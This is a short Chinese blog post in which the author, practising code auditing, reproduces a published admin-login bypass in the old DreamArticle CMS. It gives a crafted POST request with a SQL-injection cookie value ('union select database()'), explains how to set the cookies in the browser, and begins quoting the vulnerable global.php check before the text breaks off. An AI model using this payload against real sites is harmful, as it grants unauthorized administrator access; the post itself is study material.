一个很老的CMS了。
最近在学代码审计,看到网上有人提到这里的漏洞就想复现出来。先上图
原文:
利用DreamArticle 后台验证漏洞直接登陆后台:
http://www.webjx.com/security/leak-11941.html
构造以下post请求
POST /da/admin/index.php HTTP/1.1
...
Cookie: PHPSESSID=ci49apcu773lhpug1vd6kv6ub1; iDreamSoft_iCMS_AUTH=9ac6MxBR983xzuQb2oTLXuK%2BYVCAWytYzUACr6%2Fztq2yb6gJquFK8F4tEyXZwDns6YvUbBDaHENODiHjAYUJL0f54QtjvqswkWmwbRrV3CVprtRZgw; XDEBUG_SESSION=PHPSTORM; iDreamSoft_admincode=2126;
#关键的两个cookie:
iDreamSoft_administrator=dsaf%2527 union select database()#;
iDreamSoft_adminpassword=dreamarticle;
username=admin&password=adsdadn&codestr=2126&action=l
在chrome中安装EditThisCookie添加cookie(其实我今天手抖,双击了两下开发者工具中的application->storage-cookie下的空行居然可以直接添加cookie,但是后来无法复现了。)
本地修改action的值就可以提交
漏洞原理(2.0版本和网上文章的3.0版本还是有些不一样的):
admin/global.php
$adminid =intval(get_cookie("adminid"));
$administrator =get_cookie("administrator");
$adminpassword =get_cookie("adminpassword");
// 验证是否处于登陆状态
if ($administrator && $adminpassword && get_cookie(